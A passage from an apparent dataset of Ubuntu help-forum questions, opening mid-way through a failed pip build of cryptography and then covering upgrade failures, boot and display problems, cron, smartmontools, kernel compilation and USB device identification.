`libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found c/_cffi_backend.c:13:17 : fatal error : ffi.h : no such file or directory # include < ffi.h > ^ compilation terminated . traceback ( most recent call last ) : file `` < string > '' , line 17 , in < module > file `` /home/elie/.virtualenvs/stat/build/cryptography/setup.py '' , line 174 , in < module > `` test '' : pytest , file `` /usr/lib/python2.7/distutils/core.py '' , line 111 , in setup _setup_distribution = dist = klass ( attrs ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 239 , in __init__ self.fetch_build_eggs ( attrs.pop ( 'setup_requires ' ) ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 263 , in fetch_build_eggs parse_requirements ( requires ) , installer=self.fetch_build_egg file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 564 , in resolve dist = best [ req.key ] = env.best_match ( req , self , installer ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 802 , in best_match return self.obtain ( req , installer ) # try and download/install file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 814 , in obtain return installer ( requirement ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 313 , in fetch_build_egg return cmd.easy_install ( req ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 593 , in easy_install return self.install_item ( spec , dist.location , tmpdir , deps ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 623 , in install_item dists = self.install_eggs ( spec , download , tmpdir ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 809 , in install_eggs return self.build_and_install ( setup_script , setup_base ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1015 , in build_and_install self.run_setup ( setup_script , setup_base , args ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1003 , in run_setup raise distutilserror ( `` setup script exited with % s '' % ( v.args [ 0 ] , ) ) distutils.errors.distutilserror : setup script exited with error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 complete output from command python setup.py egg_info : package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found package libffi was not found in the pkg-config search path . perhaps you should add the directory containing `libffi.pc' to the pkg_config_path environment variable no package 'libffi ' found c/_cffi_backend.c:13:17 : fatal error : ffi.h : no such file or directory # include < ffi.h > ^ compilation terminated . traceback ( most recent call last ) : file `` < string > '' , line 17 , in < module > file `` /home/elie/.virtualenvs/stat/build/cryptography/setup.py '' , line 174 , in < module > `` test '' : pytest , file `` /usr/lib/python2.7/distutils/core.py '' , line 111 , in setup _setup_distribution = dist = klass ( attrs ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 239 , in __init__ self.fetch_build_eggs ( attrs.pop ( 'setup_requires ' ) ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 263 , in fetch_build_eggs parse_requirements ( requires ) , installer=self.fetch_build_egg file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 564 , in resolve dist = best [ req.key ] = env.best_match ( req , self , installer ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 802 , in best_match return self.obtain ( req , installer ) # try and download/install file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/pkg_resources.py '' , line 814 , in obtain return installer ( requirement ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/dist.py '' , line 313 , in fetch_build_egg return cmd.easy_install ( req ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 593 , in easy_install return self.install_item ( spec , dist.location , tmpdir , deps ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 623 , in install_item dists = self.install_eggs ( spec , download , tmpdir ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 809 , in install_eggs return self.build_and_install ( setup_script , setup_base ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1015 , in build_and_install self.run_setup ( setup_script , setup_base , args ) file `` /home/elie/.virtualenvs/stat/local/lib/python2.7/site-packages/setuptools/command/easy_install.py '' , line 1003 , in run_setup raise distutilserror ( `` setup script exited with % s '' % ( v.args [ 0 ] , ) ) distutils.errors.distutilserror : setup script exited with error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command python setup.py egg_info failed with error code 1 in /home/elie/.virtualenvs/stat/build/cryptography storing debug log for failure in /home/elie/.pip/pip.log i used to install scrapy before , never had issues , what 's wrong ?
499717	14.04 missing login prompt after screensaver	this question is a duplicate of this , although i am not the same person as that poster . i hope that re-asking it will be productive because ( a ) it seems to be a pretty terrible 14.04 bug , worth addressing/escalating , and ( b ) i 'm going to provide some additional details . additional details about my system : -- system 76 laptop -- intel® core™ i5-3210m cpu @ 2.50ghz × 4 -- intel® ivybridge mobile -- 64 bit -- i recently installed 14.04 as a clean install , from disk ( no `` upgrading '' ) .
499719	shortcut for switching between applications	i am using unity desktop environment . i find it difficult to switch between multiple open applications frequently . i currently use the alt+tab to get list of open applications and then switch to the required one . i want to know whether we can switch directly to the required application by somehow ordering the applications and then switching to required application by some shortcut like alt+3 for third application . thanks .
499721	upgrade to ubuntu 12.04 failures	i upgraded my ubuntu to 12.04 through software center and it did not go well . the problem is i 'm using this machine after a long time that i do n't remember the previous version no ( definitely greater than 10.0 ) machine : asus a8eseries the font colors changed to white , it did not detect ext hard drives . i did an upgrade from terminal and now i get the following problems : the text font color on all windows changed to white the track pad did not work ( which i fixed using this thread http : //ubuntuforums.org/showthread.php ? t=1971196 ) network menu not showing wireless option itself . my output for `` dmesg | grep iwl '' and rfkill list all are blank external hard disk not detecting . i need to back up my files before upgrading again . unity one launcher not working . no menus at the top right corner and many more failures . i really need to back up my files which is the most important task . also get my wireless working . please kindly help . regards , psun
499723	ubuntu 13.04 update and upgrade issues	i am having a terrible time upgrading from 13.04 to 13.10 , which i need to do in order to upgrade to saucy . i can not do a software update on 13.04 , which is required before upgrading to 13.10 . i get an error message saying that i have no connection to the internet . clearly , this is not the case as i am composing this 'question ' on the same computer at this very moment . if it is at all helpful , several months ago , before 13.10 was even available , i occasionally received an error message saying my hard drive was out of space . this was not true , either , as the system ran all programs perfectly fine . does anyone have any suggestions regarding my situation and how i should go about handling it ?
499728	rtcwake cron does not work	i intend to put my computer to sleep every night and make it wake up again next morning . i found that rtcwake would serve my purpose . however putting it in the crontab does nothing . following is my crontab entry for `` root '' user 0 1 * * * rtcwake -m disk -s 25200 i added it using 'sudo crontab -e ' . the syslog shows that it executed the command , but the computer does not sleep . if i run the command on terminal directly , the computer is put to sleep immediately as expected . so i do n't think there is any problem with acpi . does anyone have a clue ? i am on ubuntu 14.04
499729	kubuntu on a persistent live usb wo n't start up on my desktop	it perfectly starts up on my alienware laptop -the laptop from which i created it- and my hp laptop ; however , when i try to boot it up on my desktop . it proceed until the kubuntu logo , which keeps flashing blue , then gives this screen i.imgur ( . ) com/j0gfjef ( . ) jpg remove the `` ( ) '' around the dot in ( . ) com and ( . ) jpg so you can open the link to the photo by the way , i checked for an proprietary drivers installed and i found non .
499731	14.04 - smartmontools daemon failing to start , possible syntax error in smartd.conf ?	i 'm trying to get daily s.m.a.r.t . checks and emails going on a file server , but every time i try to restart the smartmontools service it fails . sample line from my smartd.conf , mostly copied directly from a config guide i found here : http : //guylabs.ch/2013/07/18/monitor-s-m-a-r-t-with-smartmontools-in-ubuntu-13-04/ /dev/sda -a -d sat -o on -s on -s ( s/../.././03|l/../../6/03 ) -m email.address @ domain.com -m exec /usr/share/smartmontools/smartd-runner i 've tried a number of variants on this line , and i 'm just not getting anywhere . it feels as though i 've missed some critical configuration step or completely misunderstood the syntax of the config file .
499732	problems after installing the “new hardware support is available”	problem started july 11th 2014 when i got the update . each time when booting up my ubuntu 12.04 lts , i got a black screen with this message `` could not write bytes : broken pipe '' on the top left hand corner . today i reinstalled ubuntu 12.04 lts and now when i click on software updater i see “new hardware support is available” . do i really need to get this update ? is there a way to avoid it ? my pc is working fine without that update ...
499733	can i use ubuntu with this pc ? if i can then what is this error ?	this is the con figuration of pc after i burned the iso file to a dvd , i restarted my computer and set my boot devices in bios as well and tried booting to that screen that says `` try ubuntu or install ubuntu on hard drive '' but halfway through loading from dvd or usb it got stuck like something went wrong and a red spot was in the screen like this : fyi : i had a similar problem that was like this one with fedora live-desktop-20.1 and what i mean by that is to me looks like the dvd drives and usb kinda fails to deliver the data and it cause this weirdness but hey look this is the first time in my life i 'm going after linux and i know this pc is a dinosaur but honestly ... i 'm very disappointed ... .
499734	nautilus 3.4 on ubuntu-gnome 14.04 lts	i 'd like to get nautilus 3.4 on a fresh install of ubuntu-gnome 14.04 . nautilus 3.10 is the earliest version available through the default repositories . there are instructions around for earlier versions of ubuntu but they do n't directly work for 14.04 and i do n't know enough about apt-get to tell why or adapt them .
499735	fern wifi cracker wont open on ubuntu 14.04	i installed fern wifi cracker on ubuntu and when i try to open it the little loading indicator spins for a while and then just stops how do i fix this ?
499738	not able to install software on ubuntu 12.10	i am newbie with ubuntu.i am trying to download okular pdf reader from software center but i am getting some error . at first it was asking for installation of packages from not authenticated source , when i click on use this source it goes and do something like upadating cache then after some time it shows me this error : i read this question `` requires installation of untrusted packages ? `` and tried to rebuild cache as given in first answer using : sudo apt-get clean cd /var/lib/apt sudo mv lists lists.old sudo mkdir -p lists/partial sudo apt-get clean sudo apt-get update and got this output : yogeshwardancharan @ ubuntu : ~ $ sudo apt-get clean [ sudo ] password for yogeshwardancharan : yogeshwardancharan @ ubuntu : ~ $ cd /var/lib/apt yogeshwardancharan @ ubuntu : /var/lib/apt $ sudo mv lists lists.old yogeshwardancharan @ ubuntu : /var/lib/apt $ sudo mkdir -p lists/partial yogeshwardancharan @ ubuntu : /var/lib/apt $ sudo apt-get clean yogeshwardancharan @ ubuntu : /var/lib/apt $ sudo apt-get update get:1 http : //dl.google.com stable release.gpg [ 198 b ] get:2 http : //dl.google.com stable release.gpg [ 198 b ] get:3 http : //dl.google.com stable release [ 1,347 b ] get:4 http : //ppa.launchpad.net quantal release.gpg [ 316 b ] ign http : //security.ubuntu.com quantal-security release.gpg get:5 http : //dl.google.com stable release [ 1,347 b ] ign http : //us.archive.ubuntu.com quantal release.gpg get:6 http : //dl.google.com stable/main i386 packages [ 1,227 b ] get:7 http : //ppa.launchpad.net quantal release.gpg [ 316 b ] ign http : //security.ubuntu.com quantal-security release ign http : //us.archive.ubuntu.com quantal-updates release.gpg get:8 http : //ppa.launchpad.net quantal release [ 11.9 kb ] get:9 http : //dl.google.com stable/main i386 packages [ 710 b ] ign http : //us.archive.ubuntu.com quantal-backports release.gpg get:10 http : //ppa.launchpad.net quantal release [ 11.9 kb ] ign http : //us.archive.ubuntu.com quantal-proposed release.gpg get:11 http : //ppa.launchpad.net quantal/main sources [ 4,251 b ] ign http : //us.archive.ubuntu.com quantal release get:12 http : //ppa.launchpad.net quantal/main i386 packages [ 14.3 kb ] ign http : //us.archive.ubuntu.com quantal-updates release ign http : //us.archive.ubuntu.com quantal-backports release ign http : //us.archive.ubuntu.com quantal-proposed release get:13 http : //ppa.launchpad.net quantal/main sources [ 16.7 kb ] get:14 http : //ppa.launchpad.net quantal/main i386 packages [ 39.4 kb ] ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en err http : //security.ubuntu.com quantal-security/main sources 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/restricted sources 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/universe sources 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/multiverse sources 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/main i386 packages 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/restricted i386 packages 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/universe i386 packages 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com quantal-security/multiverse i386 packages 404 not found [ ip : 91.189.92.201 80 ] ign http : //security.ubuntu.com quantal-security/main translation-en_us ign http : //security.ubuntu.com quantal-security/main translation-en ign http : //security.ubuntu.com quantal-security/multiverse translation-en_us ign http : //security.ubuntu.com quantal-security/multiverse translation-en ign http : //security.ubuntu.com quantal-security/restricted translation-en_us ign http : //security.ubuntu.com quantal-security/restricted translation-en ign http : //security.ubuntu.com quantal-security/universe translation-en_us ign http : //security.ubuntu.com quantal-security/universe translation-en err http : //us.archive.ubuntu.com quantal/main sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/restricted sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/universe sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/multiverse sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/main i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/restricted i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/universe i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal/multiverse i386 packages 404 not found [ ip : 91.189.91.14 80 ] ign http : //us.archive.ubuntu.com quantal/main translation-en_us ign http : //us.archive.ubuntu.com quantal/main translation-en ign http : //us.archive.ubuntu.com quantal/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal/multiverse translation-en ign http : //us.archive.ubuntu.com quantal/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal/restricted translation-en ign http : //us.archive.ubuntu.com quantal/universe translation-en_us ign http : //us.archive.ubuntu.com quantal/universe translation-en err http : //us.archive.ubuntu.com quantal-updates/main sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/restricted sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/universe sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/multiverse sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/main i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/restricted i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/universe i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-updates/multiverse i386 packages 404 not found [ ip : 91.189.91.14 80 ] ign http : //us.archive.ubuntu.com quantal-updates/main translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/main translation-en ign http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en ign http : //us.archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/restricted translation-en ign http : //us.archive.ubuntu.com quantal-updates/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/universe translation-en err http : //us.archive.ubuntu.com quantal-backports/main sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/restricted sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/universe sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/multiverse sources 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/main i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/restricted i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/universe i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-backports/multiverse i386 packages 404 not found [ ip : 91.189.91.14 80 ] ign http : //us.archive.ubuntu.com quantal-backports/main translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/main translation-en ign http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en ign http : //us.archive.ubuntu.com quantal-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/restricted translation-en ign http : //us.archive.ubuntu.com quantal-backports/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/universe translation-en err http : //us.archive.ubuntu.com quantal-proposed/restricted i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-proposed/main i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-proposed/multiverse i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com quantal-proposed/universe i386 packages 404 not found [ ip : 91.189.91.14 80 ] ign http : //us.archive.ubuntu.com quantal-proposed/main translation-en_us ign http : //us.archive.ubuntu.com quantal-proposed/main translation-en ign http : //us.archive.ubuntu.com quantal-proposed/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-proposed/multiverse translation-en ign http : //us.archive.ubuntu.com quantal-proposed/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-proposed/restricted translation-en ign http : //us.archive.ubuntu.com quantal-proposed/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-proposed/universe translation-en fetched 104 kb in 1min 56s ( 892 b/s ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/main/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/restricted/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/universe/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/multiverse/source/sources 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/main/binary-i386/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/restricted/binary-i386/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/universe/binary-i386/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/multiverse/binary-i386/packages 404 not found [ ip : 91.189.92.201 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/main/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/restricted/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/universe/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/multiverse/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/main/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/restricted/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/universe/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/multiverse/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/main/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/restricted/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/universe/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/main/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/multiverse/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-proposed/universe/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . then i tried to re-install okular but again getting same errors . i have tried changing software source to main server and also enabled authentication for third party software sources but still no progress .
499740	ubuntu 14.04 installation bug i think i 'm a newbie	i downloaded ubuntu14.04 ( 64 bit ) and burned it on a dvd disc , as it told me to do , booted it up and it started installing . i got it installed ( i think ) and it shows the ubuntu loading screen , and then the screen goes black and sometimes it displays the home screen for about 30 seconds ( i can move my mouse across the screen but i ca n't click anything ) , and then the screen glitches out and displays a purple screen with white lines here and there but that is only sometimes , most of the time it displays just a black screen . can someone help me get it to where it is installed correctly ?
499748	operating system not found - tried everything	as the title says , i get the freakin ' `` operating system not found '' when i try to boot up my netbook . a little bit of history back in 2012 my netbook prompted the message for the first time . i just turned it off and on and the message was gone and i booted ubuntu successfully . two years ( approximately ) after that , the message prompted again , but this time i can not boot at all when switching the netbook off and on again . things i 've inspected if i go into the bios setup , i can see the disk is there , but with no operating system ( in the boot order menu ) . when i told it to my tech guy , he took a look at the machine and told me the disk was broken and that i needed to replace it . but when i go live ( booting ubuntu live from a usb stick ) i can see the disk , in fact i can browse and open the files in it . if i go to disks , the disk is listed and actually says that the main partition is a linux bootable one . things i 've tried i reinstalled the system several times with no luck . trying to install another distro did n't work either . i 've tried the boot-repair tool with no success . both repairing automatically and repairing mbr . here are the three pastes from boot-repair : automatic advanced/mbr with ubuntu 12.04 advanced/mbr with ubuntu 14.04 i wish someone could enlighten me on this one . what else can i try ? do i need to replace the hard drive or is there any other solution ? what could be broken ? by the way , the machine in question is a 2011 samsung nc-110 with all the default hardware it came with .
499750	kernel compilation	i 'm trying to compile a source linux kernel ( version linux-3.10.48 ) . using the make menuconfig command , all the configurations are done and the .config file is saved , but when i 'm compiling the main kernel using the make command it shows some error like this : /usr/src/linux-3.10.48/scripts/gen_initramfs_list.sh : can not open 'y' i 'm new to kernels . can anybody please help me understand this ?
499752	replacing os , boot loader not showing	i know many have asked this before but their problem is either : it directly boot to windows or does not boot at all . but my problem is slightly different and fixing this might also be different or easier . i have dual boot linuxmint & windows and i replaced the old linuxmint with the latest ubuntu release . the installation was successful but it directly boot to ubuntu and not showing the choices of os 's like before . i thought installing grub and running update-grub will fix it but it did n't . any suggestions ? thanks .
499755	black screen with x cursor on boot up	i 've just started using ubuntu as my main daily driver and have almost worked our the kinks . there 's one that is persistent though - i can not boot using normal methods . i get booted into a black screen , which can not do anything from - no ctrl+alt+f1 , no console - i do get the cursor however is a black x that does nothing but move when i move the mouse . i have to use advanced ubuntu options whilst in grub and load up the recovery console , from here all i need to do is resume boot and it works fine . is there anyway i could fix this error without having to reinstall - i 'm using an i7 4770k , 16gb of crucial ram , nvidia gtx 770 and a gigabyte ga-z87-hd3 . not sure if that helps but it 's better to have the info than not . edit : i 'm using nivdia driver 331.67 , i tried upgrading to the latest ( 340 ? ) and had the same issue plus others so i went back to the driver i had installed before . thanks for the help .
499758	how to distinguish between identical usb 's	i have this system where i have 8 usb rfid readers which i would like to distinguish from one another . here 's a snippet from lsusb bus 002 device 011 : id 05fe:1010 chic technology corp. optical wireless bus 002 device 012 : id 05fe:1010 chic technology corp. optical wireless as you can see both the idvendor and the idproduct is the same for the two usb rfid readers . q1 : can anyone help me do a -- attrubute-walk with the udev info so i can see if there 's any parameter that is unique to the individual readers . ( i 'm using ubuntu 14.04 lts ) this is the sys path i think i 'm supposed to look in , and what the folder contains : nicolai @ nicolai-k53sv : ~ $ ls /sys/bus/usb/devices/ 1-0:1.0 1-1:1.0 1-1.2:1.0 1-1.4 2-0:1.0 2-1:1.0 4-0:1.0 usb2 usb4 1-1 1-1.2 1-1.2:1.1 1-1.4:1.0 2-1 3-0:1.0 usb1 usb3 so of course i tried the following : udevadm info -- attribute-walk -- path=/sys/bus/usb/devices/usb1 udevadm info -- attribute-walk -- path=/sys/bus/usb/devices/usb2 udevadm info -- attribute-walk -- path=/sys/bus/usb/devices/usb3 udevadm info -- attribute-walk -- path=/sys/bus/usb/devices/usb4 but i ca n't seem to find the two devices listed at the top ( with id 05fe:1010 ) . q2 : if there is a parameter that is unique to the individual reader , how can i ( hopefully in python ) distinguish between them ? here 's some python code which i thought i could use ( until i realised that the id 's where the same for every rfid reader ) import usb dev = usb.core.find ( idvendor=0x05fe , idproduct=0x1010 ) if dev is none : raise valueerror ( 'device not found ' ) else : print ( 'device found ' ) update a1 : here 's the output from the lsusb -v : http : //paste.ubuntu.com/7818192/ as it can be seen the iserial is just zero and all the other attributes are the same for both devices . so for q2 : i was wondering if i could use the setserial bash command to write a serial to the usb rfid reader . if so , is this serial stored even after the power is lost , or do you have to create a script that creates the serials every time you boot ? any suggestion is helpful .
499763	scrolling in all apps on touchscreen in 14.04 desktop ?	i 'm using a samsung ativ tab 700t1c on ubuntu 14.04 desktop . this is a hybrid tablet with a touchscreen , wacom digitizer and detachable keyboard dock , and a high dpi ( hd in 11.6 '' ) display . is there any way to configure a universal scroll for the touchscreen ? the three and four finger gestures in unity work as described here : https : //wiki.ubuntu.com/multitouch but they seem to assume that another driver ( e.g . synaptics ) is providing one and two finger gestures including scroll . i 've briefly tried touchegg and ginn without success . touchegg starts but does n't seem to be able to capture any gestures . ginn fails with `` error subscribing to gestures . '' to make things worse , the touchpad is n't properly supported in linux so i ca n't use two-finger scroll when docked either . unfortunately , this renders the machine very hard to use as navigating to the scroll areas is very fiddly . thanks for your help !
